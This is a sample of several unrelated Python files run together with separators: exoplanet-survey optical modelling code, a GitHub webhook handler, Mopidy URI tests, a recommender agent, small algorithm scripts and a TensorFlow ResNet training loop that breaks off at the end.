        self.starlightSuppressionSystems = starlightSuppressionSystems
        self.haveOcculter = False
        self._outspec['starlightSuppressionSystems'] = []
        for nsyst, syst in enumerate(self.starlightSuppressionSystems):
            assert isinstance(syst, dict), \
                    "Starlight suppression systems must be defined as dicts."
            assert syst.has_key('type') and isinstance(syst['type'], basestring), \
                    "All starlight suppression systems must have key type."
            # populate with values that may be filenames (interpolants)
            syst['throughput'] = syst.get('throughput', throughput)
            syst['contrast'] = syst.get('contrast', contrast)
            syst['PSF'] = syst.get('PSF', PSF)
            self._outspec['starlightSuppressionSystems'].append(syst.copy())

            # set an occulter, for an external or hybrid system
            if syst['type'].lower() in ('external', 'hybrid'):
                self.haveOcculter = True

            # handle inf OWA
            if syst.get('OWA') == 0:
                syst['OWA'] = np.Inf

            # check for throughput
            if isinstance(syst['throughput'], basestring):
                pth = os.path.normpath(os.path.expandvars(syst['throughput']))
                assert os.path.isfile(pth), "%s is not a valid file."%pth
                dat = fits.open(pth)[0].data
                assert len(dat.shape) == 2 and 2 in dat.shape, \
                        "Wrong throughput data shape."
                WA = dat[0] if dat.shape[0] == 2 else dat[:,0]
                T = dat[1] if dat.shape[0] == 2 else dat[:,1]
                assert np.all(T >= 0), "Throughput must be positive."
                Tinterp = scipy.interpolate.interp1d(WA, T, kind='cubic',
                        fill_value=np.nan, bounds_error=False)
                syst['throughput'] = lambda lam, WA: Tinterp(WA)

                # Calculate max throughput
                Tmax = scipy.optimize.minimize(lambda x: -syst['throughput'](lam, x),
                        WA[np.argmax(T)], bounds=((np.min(WA), np.max(WA)),))
                if Tmax.success:
                    Tmax = -Tmax.fun[0]
                else:
                    print "Warning: failed to find maximum of throughput " \
                            "interpolant for starlight suppression system " \
                            "#%d"%(nsyst+1)
                    Tmax = np.max(T)    # (was `np.Tmax(T)`, which does not exist)

                # Calculate IWA and OWA, defined as angular separations
                # corresponding to 50% of maximum throughput
                WA_min = scipy.optimize.fsolve(lambda x: syst['throughput']
                        (lam, x) - Tmax/2., np.min(WA))[0]
                WA_max = np.max(WA) - scipy.optimize.fsolve(lambda x: syst['throughput']
                        (lam, np.max(WA) - x) - Tmax/2., 0.)[0]
                syst['IWA'] = max(np.min(WA), syst.get('IWA', WA_min))
                syst['OWA'] = min(np.max(WA), syst.get('OWA', WA_max))
            elif isinstance(syst['throughput'], numbers.Number):
                assert syst['throughput'] > 0, "Throughput must be positive."
                syst['throughput'] = lambda lam, WA, T=float(syst['throughput']): T

            # check for contrast
            if isinstance(syst['contrast'], basestring):
                pth = os.path.normpath(os.path.expandvars(syst['contrast']))
                assert os.path.isfile(pth), "%s is not a valid file."%pth
                dat = fits.open(pth)[0].data
                assert len(dat.shape) == 2 and 2 in dat.shape, \
                        "Wrong contrast data shape."
                WA = dat[0] if dat.shape[0] == 2 else dat[:,0]
                C = dat[1] if dat.shape[0] == 2 else dat[:,1]
                assert np.all(C >= 0), "Contrast must be positive."
                Cinterp = scipy.interpolate.interp1d(WA, C, kind='cubic',
                        fill_value=np.nan, bounds_error=False)
                syst['contrast'] = lambda lam, WA: Cinterp(WA)
                # Constraining IWA and OWA
                syst['IWA'] = max(np.min(WA), syst.get('IWA', np.min(WA)))
                syst['OWA'] = min(np.max(WA), syst.get('OWA', np.max(WA)))
            elif isinstance(syst['contrast'], numbers.Number):
                assert syst['contrast'] > 0, "Contrast must be positive."
                syst['contrast'] = lambda lam, WA, C=float(syst['contrast']): C

            # check for PSF
            if isinstance(syst['PSF'], basestring):
                pth = os.path.normpath(os.path.expandvars(syst['PSF']))
                assert os.path.isfile(pth), "%s is not a valid file."%pth
                hdr = fits.open(pth)[0].header
                dat = fits.open(pth)[0].data
                assert len(dat.shape) == 2, "Wrong PSF data shape."
                assert np.any(dat), "PSF must be != 0"
                syst['PSF'] = lambda lam, WA, P=dat: P
                if hdr.get('SAMPLING') is not None:
                    syst['samp'] = hdr.get('SAMPLING')
            else:
                assert np.any(syst['PSF']), "PSF must be != 0"
                syst['PSF'] = lambda lam, WA, P=np.array(syst['PSF']).astype(float): P

            # default IWA/OWA if not specified or calculated
            if not(syst.get('IWA')):
                syst['IWA'] = IWA if IWA else 0.
            if not(syst.get('OWA')):
                syst['OWA'] = OWA if OWA else np.Inf

            # Loading system specifications
            syst['IWA'] = float(syst.get('IWA'))*u.arcsec           # inner WA
            syst['OWA'] = float(syst.get('OWA'))*u.arcsec           # outer WA
            syst['samp'] = float(syst.get('samp', samp))*u.arcsec   # PSF sampling
            syst['ohTime'] = float(syst.get('ohTime', ohTime))*u.d  # overhead time
            # imaging and characterization time multipliers
            syst['imagTimeMult'] = float(syst.get('imagTimeMult', imagTimeMult))
            syst['charTimeMult'] = float(syst.get('charTimeMult', charTimeMult))

            # populate system specifications to outspec
            for att in syst.keys():
                if att not in ['throughput', 'contrast', 'PSF']:
                    dat = syst[att]
                    self._outspec['starlightSuppressionSystems'][nsyst][att] \
                            = dat.value if isinstance(dat, u.Quantity) else dat

        # populate fundamental IWA and OWA as required
        IWAs = [x.get('IWA') for x in self.starlightSuppressionSystems
                if x.get('IWA') is not None]
        if IWA is not None:
            self.IWA = float(IWA)*u.arcsec
        elif IWAs:
            self.IWA = min(IWAs)
        else:
            raise ValueError("Could not determine fundamental IWA.")

        OWAs = [x.get('OWA') for x in self.starlightSuppressionSystems
                if x.get('OWA') is not None]
        if OWA is not None:
            self.OWA = float(OWA)*u.arcsec if OWA != 0 else np.inf*u.arcsec
        elif OWAs:
            self.OWA = max(OWAs)
        else:
            raise ValueError("Could not determine fundamental OWA.")

        assert self.IWA < self.OWA, "Fundamental IWA must be smaller than the OWA."

        # populate outspec with all OpticalSystem scalar attributes
        for att in self.__dict__.keys():
            if att not in ['F0', 'scienceInstruments', 'starlightSuppressionSystems',
                    'Imager', 'ImagerSyst', 'Spectro', 'SpectroSyst']:
                dat = self.__dict__[att]
                self._outspec[att] = dat.value if isinstance(dat, u.Quantity) else dat

        # default detectors and imagers
        self.Imager = self.scienceInstruments[0]
        self.ImagerSyst = self.starlightSuppressionSystems[0]
        self.Spectro = self.scienceInstruments[-1]
        self.SpectroSyst = self.starlightSuppressionSystems[-1]

    def __str__(self):
        """String representation of the Optical System object

        When the command 'print' is used on the Optical System object, this
        method will print the attribute values contained in the object"""

        for att in self.__dict__.keys():
            print '%s: %r' % (att, getattr(self, att))
        return 'Optical System class object attributes'

    def Cp_Cb(self, TL, sInds, dMag, WA, fEZ, fZ, inst, syst, Npix):
        """Calculates electron count rates for planet signal and background noise.

        Args:
            TL (object):
                TargetList class object
            sInds (integer ndarray):
                Integer indices of the stars of interest, with the length of
                the number of planets of interest
            dMag (float ndarray):
                Differences in magnitude between planets and their host star
            WA (astropy Quantity array):
                Working angles of the planets of interest in units of arcsec
            fEZ (astropy Quantity array):
                Surface brightness of exo-zodiacal light in units of 1/arcsec2
            fZ (astropy Quantity array):
                Surface brightness of local zodiacal light in units of 1/arcsec2
            inst (dict):
                Selected Science Instrument
            syst (dict):
                Selected Starlight Suppression System
            Npix (float):
                Number of noise pixels

        Returns:
            C_p (astropy Quantity array):
                Planet signal electron count rate in units of 1/s
            C_b (astropy Quantity array):
                Background noise electron count rate in units of 1/s
        """

        # check type of sInds
        sInds = np.array(sInds)
        if not sInds.shape:
            sInds = np.array([sInds])

        lam = inst['lam']                       # central wavelength
        deltaLam = inst['deltaLam']             # bandwidth
        QE = inst['QE'](lam)                    # quantum efficiency
        Q = syst['contrast'](lam, WA)           # contrast
        T = syst['throughput'](lam, WA) / inst['Ns'] \
                * self.attenuation              # throughput
        mV = TL.starMag(sInds, lam)             # star visual magnitude
        X = np.sqrt(2)/2                        # aperture photometry radius (in lam/D)
        Theta = (X*lam/self.pupilDiam*u.rad).to('arcsec')  # angular radius (in arcseconds)
        Omega = np.pi*Theta**2                  # solid angle subtended by the aperture

        # electron count rates [ s^-1 ]
        C_F0 = self.F0(lam)*QE*T*self.pupilArea*deltaLam
        C_p = C_F0*10.**(-0.4*(mV + dMag))      # planet signal
        C_sr = C_F0*10.**(-0.4*mV)*Q            # residual suppressed starlight (coro)
        C_zl = C_F0*(fZ+fEZ)*Omega              # zodiacal light = local + exo
        C_dc = Npix*inst['idark']               # dark current
        C_cc = Npix*inst['CIC']/inst['texp']    # clock-induced-charge
        C_rn = Npix*(inst['sread']/inst['Gem'])**2/inst['texp']  # readout noise
        C_b = inst['ENF']**2*(C_sr+C_zl+C_dc+C_cc)+C_rn          # total noise budget

        return C_p, C_b

    def calc_intTime(self, TL, sInds, dMag, WA, fEZ, fZ):
        """Finds integration time for a specific target system

        This method is called by a method in the SurveySimulation class object.
        This method defines the data type expected; integration time is
        determined by specific OpticalSystem classes.

        Args:
            TL (object):
                TargetList class object
            sInds (integer ndarray):
                Integer indices of the stars of interest, with the length of
                the number of planets of interest
            dMag (float ndarray):
                Differences in magnitude between planets and their host star
            WA (astropy Quantity array):
                Working angles of the planets of interest in units of arcsec
            fEZ (astropy Quantity array):
                Surface brightness of exo-zodiacal light in units of 1/arcsec2
            fZ (astropy Quantity array):
                Surface brightness of local zodiacal light in units of 1/arcsec2

        Returns:
            intTime (astropy Quantity array):
                Integration times in units of day
        """

        # check type of sInds
        sInds = np.array(sInds)
        if not sInds.shape:
            sInds = np.array([sInds])

        intTime = np.ones(len(sInds))*u.day

        return intTime

    def calc_charTime(self, TL, sInds, dMag, WA, fEZ, fZ):
        """Finds characterization time for a specific target system

        This method is called by a method in the SurveySimulation class object.
        This method defines the data type expected; characterization time is
        determined by specific OpticalSystem classes.

        Args:
            TL (object):
                TargetList class object
            sInds (integer ndarray):
                Integer indices of the stars of interest, with the length of
                the number of planets of interest
            dMag (float ndarray):
                Differences in magnitude between planets and their host star
            WA (astropy Quantity array):
                Working angles of the planets of interest in units of arcsec
            fEZ (astropy Quantity array):
                Surface brightness of exo-zodiacal light in units of 1/arcsec2
            fZ (astropy Quantity array):
                Surface brightness of local zodiacal light in units of 1/arcsec2

        Returns:
            charTime (astropy Quantity array):
                Characterization times in units of day
        """

        # check type of sInds
        sInds = np.array(sInds)
        if not sInds.shape:
            sInds = np.array([sInds])

        charTime = np.ones(len(sInds))*u.day

        return charTime

    def calc_maxintTime(self, TL):
        """Finds maximum integration time for target systems

        This method is called in the __init__ method of the TargetList class
        object. The working angle is set to the optical system IWA value, and
        the planet inclination is set to 0.

        Args:
            TL (object):
                TargetList class object

        Returns:
            maxintTime (astropy Quantity array):
                Maximum integration times for target list stars in units of day
        """

        # generate sInds for the whole TargetList
        sInds = np.array(range(TL.nStars))

        # set default max integration time to dMag = dMagLim, WA = IWA, fzodi = 0
        dMag = np.array([self.dMagLim]*TL.nStars)
        WA = np.array([self.IWA.value]*TL.nStars)*u.arcsec
        fEZ = np.zeros(TL.nStars)/u.arcsec**2
        fZ = np.zeros(TL.nStars)/u.arcsec**2
        maxintTime = self.calc_intTime(TL, sInds, dMag, WA, fEZ, fZ)

        return maxintTime
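# Back-of-the-envelope version of the Cp_Cb() signal chain above, with plain
# floats instead of astropy Quantities (all numbers are illustrative; F0
# follows the "~9.5e7 ph/s/m2/nm @ 500nm" comment, and the pupil area follows
# the defaults: 4 m diameter, shapeFac=pi/4, obscurFac=0.1):
if __name__ == '__main__':
    F0 = 9.5e7            # zero-magnitude flux density [ph/s/m^2/nm]
    A = 11.3              # pupil area [m^2] = (1-0.1)*(pi/4)*4**2
    deltaLam = 100.0      # bandwidth [nm]
    QE, T = 0.9, 1e-2     # quantum efficiency, coronagraph throughput
    mV, dMag = 5.0, 20.0  # star magnitude, planet-star delta magnitude

    C_F0 = F0*QE*T*A*deltaLam           # zero-magnitude count rate [1/s]
    C_p = C_F0*10.**(-0.4*(mV + dMag))  # planet signal, as in Cp_Cb()
    print(C_p)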
# ----- nilq/baby-python | python -----
# Copyright (c) ACSONE SA/NV 2018
# Distributed under the MIT License (http://opensource.org/licenses/MIT).

import logging

from ..router import router
from ..tasks.main_branch_bot import main_branch_bot
from ..version_branch import is_main_branch_bot_branch

_logger = logging.getLogger(__name__)


@router.register("push")
async def on_push_to_main_branch(event, gh, *args, **kwargs):
    """On push to main branches, run the main branch bot task."""
    org, repo = event.data["repository"]["full_name"].split("/")
    branch = event.data["ref"].split("/")[-1]
    if not is_main_branch_bot_branch(branch):
        return
    main_branch_bot.delay(org, repo, branch)
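# A minimal sketch of the ref parsing above (the payload dict is illustrative;
# GitHub push events deliver the target ref as e.g. "refs/heads/12.0"):
if __name__ == "__main__":
    event_data = {"repository": {"full_name": "OCA/mis-builder"}, "ref": "refs/heads/12.0"}
    org, repo = event_data["repository"]["full_name"].split("/")
    branch = event_data["ref"].split("/")[-1]
    assert (org, repo, branch) == ("OCA", "mis-builder", "12.0")
    # Note: a branch name containing "/" would be truncated by this split.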
# ----- nilq/baby-python | python -----
import os
import pathlib

import pytest

from mopidy_local import translator


@pytest.mark.parametrize(
    "local_uri,file_uri",
    [
        ("local:directory:A/B", "file:///home/alice/Music/A/B"),
        ("local:directory:A%20B", "file:///home/alice/Music/A%20B"),
        ("local:directory:A+B", "file:///home/alice/Music/A%2BB"),
        (
            "local:directory:%C3%A6%C3%B8%C3%A5",
            "file:///home/alice/Music/%C3%A6%C3%B8%C3%A5",
        ),
        ("local:track:A/B.mp3", "file:///home/alice/Music/A/B.mp3"),
        ("local:track:A%20B.mp3", "file:///home/alice/Music/A%20B.mp3"),
        ("local:track:A+B.mp3", "file:///home/alice/Music/A%2BB.mp3"),
        (
            "local:track:%C3%A6%C3%B8%C3%A5.mp3",
            "file:///home/alice/Music/%C3%A6%C3%B8%C3%A5.mp3",
        ),
    ],
)
def test_local_uri_to_file_uri(local_uri, file_uri):
    media_dir = pathlib.Path("/home/alice/Music")
    assert translator.local_uri_to_file_uri(local_uri, media_dir) == file_uri


@pytest.mark.parametrize("uri", ["A/B", "local:foo:A/B"])
def test_local_uri_to_file_uri_errors(uri):
    media_dir = pathlib.Path("/home/alice/Music")
    with pytest.raises(ValueError):
        translator.local_uri_to_file_uri(uri, media_dir)


@pytest.mark.parametrize(
    "uri,path",
    [
        ("local:directory:A/B", b"/home/alice/Music/A/B"),
        ("local:directory:A%20B", b"/home/alice/Music/A B"),
        ("local:directory:A+B", b"/home/alice/Music/A+B"),
        (
            "local:directory:%C3%A6%C3%B8%C3%A5",
            b"/home/alice/Music/\xc3\xa6\xc3\xb8\xc3\xa5",
        ),
        ("local:track:A/B.mp3", b"/home/alice/Music/A/B.mp3"),
        ("local:track:A%20B.mp3", b"/home/alice/Music/A B.mp3"),
        ("local:track:A+B.mp3", b"/home/alice/Music/A+B.mp3"),
        (
            "local:track:%C3%A6%C3%B8%C3%A5.mp3",
            b"/home/alice/Music/\xc3\xa6\xc3\xb8\xc3\xa5.mp3",
        ),
    ],
)
def test_local_uri_to_path(uri, path):
    media_dir = pathlib.Path("/home/alice/Music")
    result = translator.local_uri_to_path(uri, media_dir)
    assert isinstance(result, pathlib.Path)
    assert bytes(result) == path


@pytest.mark.parametrize("uri", ["A/B", "local:foo:A/B"])
def test_local_uri_to_path_errors(uri):
    media_dir = pathlib.Path("/home/alice/Music")
    with pytest.raises(ValueError):
        translator.local_uri_to_path(uri, media_dir)


@pytest.mark.parametrize(
    "path,uri",
    [
        ("/foo", "file:///foo"),
        (b"/foo", "file:///foo"),
        ("/æøå", "file:///%C3%A6%C3%B8%C3%A5"),
        (b"/\x00\x01\x02", "file:///%00%01%02"),
        (pathlib.Path("/æøå"), "file:///%C3%A6%C3%B8%C3%A5"),
    ],
)
def test_path_to_file_uri(path, uri):
    assert translator.path_to_file_uri(path) == uri


@pytest.mark.parametrize(
    "path,uri",
    [
        (pathlib.Path("foo"), "local:track:foo"),
        (pathlib.Path("/home/alice/Music/foo"), "local:track:foo"),
        (pathlib.Path("æøå"), "local:track:%C3%A6%C3%B8%C3%A5"),
        (pathlib.Path(os.fsdecode(b"\x00\x01\x02")), "local:track:%00%01%02"),
    ],
)
def test_path_to_local_track_uri(path, uri):
    media_dir = pathlib.Path("/home/alice/Music")
    result = translator.path_to_local_track_uri(path, media_dir)
    assert isinstance(result, str)
    assert result == uri
# ----- nilq/baby-python | python -----
import torch
import numpy as np

from torch import nn, optim, Tensor

from ..envs.configuration import Configuration
from .abstract import Agent

# Default Arguments.
bandit_mf_square_args = {
    'num_products': 1000,
    'embed_dim': 5,
    'mini_batch_size': 32,
    'loss_function': nn.BCEWithLogitsLoss(),
    'optim_function': optim.RMSprop,
    'learning_rate': 0.01,
    'with_ps_all': False,
}


# Model.
class BanditMFSquare(nn.Module, Agent):
    def __init__(self, config=Configuration(bandit_mf_square_args)):
        nn.Module.__init__(self)
        Agent.__init__(self, config)

        self.product_embedding = nn.Embedding(
            self.config.num_products, self.config.embed_dim
        )
        self.user_embedding = nn.Embedding(
            self.config.num_products, self.config.embed_dim
        )

        # Initializing optimizer type.
        self.optimizer = self.config.optim_function(
            self.parameters(), lr=self.config.learning_rate
        )

        self.last_product_viewed = None
        self.curr_step = 0
        self.train_data = ([], [], [])
        self.all_products = np.arange(self.config.num_products)

    def forward(self, products, users=None):
        if users is None:
            users = np.full(products.shape[0], self.last_product_viewed)

        a = self.product_embedding(torch.LongTensor(products))
        b = self.user_embedding(torch.LongTensor(users))

        return torch.sum(a * b, dim=1)

    def get_logits(self):
        """Returns vector of product recommendation logits"""
        return self.forward(self.all_products)

    def update_lpv(self, observation):
        """Updates the last product viewed based on the observation"""
        assert observation is not None
        assert observation.sessions() is not None

        if observation.sessions():
            self.last_product_viewed = observation.sessions()[-1]['v']

    def act(self, observation, reward, done):
        with torch.no_grad():
            # Update last product viewed.
            self.update_lpv(observation)

            # Get logits for all possible actions.
            logits = self.get_logits()

            # No exploration strategy, choose maximum logit.
            action = logits.argmax().item()
            if self.config.with_ps_all:
                all_ps = np.zeros(self.config.num_products)
                all_ps[action] = 1.0
            else:
                all_ps = ()

            return {
                **super().act(observation, reward, done),
                **{
                    'a': action,
                    'ps': logits[action],
                    'ps-a': all_ps,
                },
            }

    def update_weights(self):
        """Update weights of embedding matrices using mini batch of data"""
        if len(self.train_data[0]) != 0:
            # Eliminate previous gradient.
            self.optimizer.zero_grad()

            assert len(self.train_data[0]) == len(self.train_data[1])
            assert len(self.train_data[0]) == len(self.train_data[2])
            lpvs, actions, rewards = self.train_data

            # Calculating logit of action and last product viewed.
            logit = self.forward(np.array(actions), np.array(lpvs))

            # Converting reward into Tensor.
            reward = Tensor(np.array(rewards))

            # Calculating supervised loss.
            loss = self.config.loss_function(logit, reward)
            loss.backward()

            # Update weight parameters.
            self.optimizer.step()

    def train(self, observation, action, reward, done=False):
        # print('BanditMFSquare train()')
        # Update last product viewed.
        self.update_lpv(observation)

        # Increment step.
        self.curr_step += 1

        # Update weights of model once mini batch of data accumulated.
        if self.curr_step % self.config.mini_batch_size == 0:
            self.update_weights()
            self.train_data = ([], [], [])
        else:
            if action is not None and reward is not None:
                self.train_data[0].append(self.last_product_viewed)
                self.train_data[1].append(action['a'])
                self.train_data[2].append(reward)
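# A toy sketch of the scoring rule used by act() above: every product is
# scored by the dot product between the current user embedding (keyed by the
# last product viewed) and each product embedding. The embedding tables below
# are made up for illustration:
if __name__ == '__main__':
    product_emb = np.array([[1.0, 0.0], [0.0, 1.0], [0.7, 0.7]])  # 3 products, dim 2
    user_emb = np.array([[0.9, 0.1], [0.2, 0.8], [0.5, 0.5]])     # keyed by last product viewed

    last_product_viewed = 0
    logits = product_emb @ user_emb[last_product_viewed]  # one score per product
    action = int(np.argmax(logits))                       # greedy choice, as in act()
    print(logits, action)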
# ----- nilq/baby-python | python -----
expected_output = {
    'traffic_steering_policy': {
        3053: {
            "sgt_policy_flag": '0x41400001',
            "source_sgt": 3053,
            "destination_sgt": 4003,
            "steer_type": 80,
            "steer_index": 1,
            "contract_name": 'Contract2',
            "ip_version": 'IPV4',
            "refcnt": 1,
            "flag": '0x41400000',
            "stale": False,
            "traffic_steering_ace": {
                1: {
                    "protocol_number": 6,
                    "source_port": 'any',
                    "destination_port": '16000',
                    "service_name": 'service_INFRA_VN',
                },
                2: {
                    "protocol_number": 17,
                    "source_port": 'any',
                    "destination_port": '12000',
                    "service_name": 'service_INFRA_VN',
                }
            },
            "traffic_steering_destination_list": 'Not exist',
            "traffic_steering_multicast_list": 'Not exist',
            "traffic_steering_policy_lifetime_secs": 86400,
            "policy_last_update_time": '05:51:21 UTC Wed Sep 29 2021',
            "policy_expires_in": '0:23:58:12',
            "policy_refreshes_in": '0:23:58:12'
        }
    }
}
# ----- nilq/baby-python | python -----
# Selection sort: repeatedly pop the smallest remaining element.
def find_smallest(array):
    smallest = array[0]
    smallest_index = 0
    for i in range(1, len(array)):
        if array[i] < smallest:
            smallest = array[i]
            smallest_index = i
    return smallest_index


res = []
my_array = [32, 2, 25, 3, 11, 78, -2, 32]
print("my_array:", my_array)
for i in range(len(my_array)):
    smallest_index = find_smallest(my_array)
    res.append(my_array.pop(smallest_index))
print("res:", res)
# ----- nilq/baby-python | python -----
from enum import Enum


class PayIDNetwork(Enum):
    # Supported networks
    RIPPLE_TESTNET = "xrpl-testnet"
    ETHEREUM_GOERLI = "eth-goerli"
    # ETHEREUM_MAINNET = "eth-mainnet"
    # RIPPLE_MAINNET = "xrpl-mainnet"

    @property
    def environment(self) -> str:
        return self.value.split("-")[1].upper()

    @property
    def headers(self) -> dict:
        return {"Accept": f"application/{self.value}+json"}

    @property
    def code(self) -> str:
        return self.value.split("-")[0].lower()

    @property
    def ticker(self) -> str:
        if self in (self.ETHEREUM_GOERLI,):
            return "ETH"
        elif self in (self.RIPPLE_TESTNET,):
            return "XRP"
        raise NotImplementedError

    @property
    def currency(self) -> str:
        if self in (self.ETHEREUM_GOERLI,):
            return "Ethereum"
        elif self in (self.RIPPLE_TESTNET,):
            return "Ripple"
        raise NotImplementedError

    @classmethod
    def from_string(cls, network: str) -> "PayIDNetwork":
        if network not in {each.value for each in cls}:
            raise ValueError(f"Invalid network: {network}")
        return cls(network)
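# Minimal usage sketch of the enum above; every value follows directly from
# the properties defined in the class:
if __name__ == "__main__":
    network = PayIDNetwork.from_string("xrpl-testnet")
    assert network is PayIDNetwork.RIPPLE_TESTNET
    assert network.headers == {"Accept": "application/xrpl-testnet+json"}
    assert network.code == "xrpl"
    assert network.environment == "TESTNET"
    assert network.ticker == "XRP"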
# ----- nilq/baby-python | python -----
# Simple billing-notice script; the user-facing strings are in Portuguese
# (customer name, due day, due month, and invoice amount are read, then a
# "your invoice is closed" message is printed).
nome = input("Nome do cliente: ")           # customer name
dv = int(input("Dia do vencimento: "))      # due day
mv = input("Digite o mes de vencimento: ")  # due month
fatura = input("Fatura: ")                  # invoice amount
print("Olá,", nome)
print("A sua fatura com vencimento em", dv, "de", mv, "no valor de R$", fatura, "está fechada.")
# ----- nilq/baby-python | python -----
# integer Knapsack (subset-sum) problem implementation
def knapsack(size, inputs):
    inputs = sorted(inputs)
    history = {0: ()}
    for cur_input in inputs:
        # Snapshot items() into a list so the dict can be mutated while
        # iterating (under Python 2 the original used items() instead of
        # iteritems() for the same reason).
        for prev_value, prev_history in list(history.items()):
            new_value = prev_value + cur_input
            new_history = prev_history + (cur_input,)
            if new_value == size:
                return new_history
            history[new_value] = new_history
    return None  # failed to find a sum.


def knapsack_wrapper(size, inputs):
    result = knapsack(size, inputs)
    if result is None:
        print("%d is not possible from combining %s" % (size, ", ".join(map(str, inputs))))
    else:
        print("%d = %s" % (size, " + ".join(map(str, result))))


knapsack_wrapper(10, [10])
knapsack_wrapper(10, [3, 5, 2])
knapsack_wrapper(2536, [132, 524, 241, 523, 251, 231, 634])
knapsack_wrapper(10, [1, 2, 3, 4, 5])
knapsack_wrapper(63, [10, 20, 30, 32, 21])
knapsack_wrapper(10, [3, 8])
knapsack_wrapper(10, [1])
knapsack_wrapper(2535, [132, 524, 241, 523, 251, 231, 634])
# ----- nilq/baby-python | python -----
from itertools import count

import numpy as np
import tensorflow as tf
from sklearn.model_selection import train_test_split

from nets.resnet_v2 import resnet_arg_scope, resnet_v2_50
from utils import preprocess, preprocess_val
import argparse
import os


def parse_args():
    parser = argparse.ArgumentParser("A script to train resnet_2_50")
    parser.add_argument("--batchsize", type=int, default=32, help="batch size")
    parser.add_argument("--lr", type=float, default=1e-3, help="learning rate")
    parser.add_argument("--numepochs", type=int, default=20,
                        help="number of epochs to train")
    parser.add_argument("--testsize", type=float, default=0.2,
                        help="ratio of validation data")
    parser.add_argument("--labelmap", type=str, default="label.csv",
                        help="labelmap file")
    parser.add_argument("--numthreads", type=int, default=4,
                        help="number of threads to read data")
    parser.add_argument("--logdir", type=str, default="logs",
                        help="log directory")
    return parser.parse_args()


def main(args):
    # Read the label file with numpy, loading everything as strings first.
    labelmap = np.genfromtxt(args.labelmap, dtype="U", delimiter=",")
    # Slice out the filenames and labels and cast them to the proper dtypes.
    filenames = labelmap[:, 0].astype(np.unicode)
    labels = labelmap[:, 1].astype(np.int64)
    # Split into training and validation sets.
    filenames_train, filenames_val, labels_train, labels_val = train_test_split(
        filenames, labels, test_size=args.testsize)

    # Build the datasets.
    # shuffle() randomizes the read order; each filename stays paired with its
    # label, only the order in which pairs are read changes.
    # train dataset
    dataset_train = tf.data.Dataset.from_tensor_slices(
        (filenames_train, labels_train)).shuffle(len(filenames_train))
    # num_parallel_calls: number of preprocessing threads (tunable).
    # batch(...): batch size (tunable).
    # prefetch(1): read one batch ahead so the GPU always has data to train on
    # and never waits for the CPU input pipeline.
    dataset_train = dataset_train.map(
        preprocess, num_parallel_calls=args.numthreads).batch(args.batchsize).prefetch(1)
    # val dataset
    dataset_val = tf.data.Dataset.from_tensor_slices(
        (filenames_val, labels_val)).shuffle(len(filenames_val))
    dataset_val = dataset_val.map(
        preprocess_val, num_parallel_calls=args.numthreads).batch(args.batchsize).prefetch(1)

    # Build a reinitializable iterator shared by both datasets.
    iterator = tf.data.Iterator.from_structure(
        dataset_train.output_types, dataset_train.output_shapes)
    training_init_op = iterator.make_initializer(dataset_train)
    validation_init_op = iterator.make_initializer(dataset_val)
    image_batch, label_batch = iterator.get_next()

    istrain = tf.placeholder(tf.bool, name="istrain")

    # arg_scope sets default values for the ops defined inside it.
    with tf.contrib.slim.arg_scope(resnet_arg_scope()):
        logits, endpoints = resnet_v2_50(image_batch, is_training=istrain)
    endpoints['model_output'] = endpoints['global_pool'] = tf.reduce_mean(
        endpoints['resnet_v2_50/block4'], [1, 2], name='pool5', keep_dims=False)
    logits = tf.layers.dense(endpoints['model_output'], 2)

    # Compute the loss.
    loss = tf.losses.sparse_softmax_cross_entropy(labels=label_batch, logits=logits)
    # Compute the accuracy.
    correct = tf.equal(tf.argmax(logits, 1), label_batch)
    accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))

    # Add loss and accuracy to the summary, for display in TensorBoard.
    tf.summary.scalar("loss", loss)
    tf.summary.scalar("accuracy", accuracy)
    merged = tf.summary.merge_all()

    # global_step is incremented by 1 on every training step.
    global_step = tf.Variable(0, trainable=False, name="global_step")

    # Optimizer. Adam is a common default; momentum with Nesterov is used here.
    # optimizer = tf.train.AdamOptimizer()
    optimizer = tf.train.MomentumOptimizer(learning_rate=args.lr, momentum=0.9,
                                           use_nesterov=True)
    # Required when using batch norm: run the update ops before the train op.
    update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    with tf.control_dependencies(update_ops):
        train_op = optimizer.minimize(loss, global_step=global_step)

    # Define a saver to checkpoint the model.
    var_list = [v for v in tf.trainable_variables() if v.name.startswith("resnet")]
    saver = tf.train.Saver(var_list, max_to_keep=None)

    # Start training.
    with tf.Session() as sess:
        # Initialize variables; everything defined above (including the
        # network weights) is actually initialized here.
        tf.global_variables_initializer().run()
        saver.restore(sess, "./resnet_v2_50.ckpt")

        # Summary writer, used to write the graph and the summaries.
        train_writer = tf.summary.FileWriter(
            logdir=os.path.join(args.logdir, "train"), graph=sess.graph)

        # Training loop over the requested number of epochs.
        for epoch in range(args.numepochs):
            print("Epoch {}/{}".format(epoch, args.numepochs))
            for mode in ["train", "val"]:
                # Initialize the iterator for the current split.
                if mode == "train":
                    sess.run(training_init_op)
                else:
                    sess.run(validation_init_op)
                # Accumulates accuracy over the whole split.
                acc_avg = 0
                # Iterate; itertools.count() provides an unbounded loop.
                for step in count():
                    # Catch tf.errors.OutOfRangeError to detect when the split
                    # has been fully consumed; the except block then runs and
                    # breaks out of this loop.
                    try:
                        # Run the ops for the current mode.
                        if mode == "train":
                            myloss, acc, summary, _ = sess.run(
                                [loss, accuracy, merged, train_op],
                                feed_dict={istrain: True})
                            train_writer.add_summary(summary, step)
                        else:
                            myloss, acc = sess.run(
                                [loss, accuracy], feed_dict={istrain: False})
                        # Add the batch accuracy to acc_avg; after the epoch it
                        # is divided by the step count to get the average
                        # accuracy over the whole split.
                        acc_avg += acc
                        # Report progress every 10 steps.
                        if step % 10 == 0:
                            print("mode: {}, step: {}, loss: {}, accuracy: {}".format(
                                mode, step, myloss, acc))
                    # Runs once the split is exhausted.
                    except tf.errors.OutOfRangeError:
                        # Print the epoch results and save the network weights.
                        print("{} Epoch {} done!".format(mode, epoch))
                        print("accuracy: {}".format(acc_avg / step))
                        if mode == "train":
                            saver.save(sess, os.path.join(args.logdir, "resnet_2_50.ckpt"))
                        # Leave the step loop.
                        break


if __name__ == "__main__":
    args = parse_args()
    main(args)
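# Distilled sketch of the TF1-style reinitializable-iterator pattern used in
# main() above: one iterator, two datasets, one init op per split (toy
# tensors, TensorFlow 1.x API; this helper is illustrative and never called):
def iterator_pattern_demo():
    ds_train = tf.data.Dataset.from_tensor_slices(tf.range(10)).batch(4)
    ds_val = tf.data.Dataset.from_tensor_slices(tf.range(100, 106)).batch(4)

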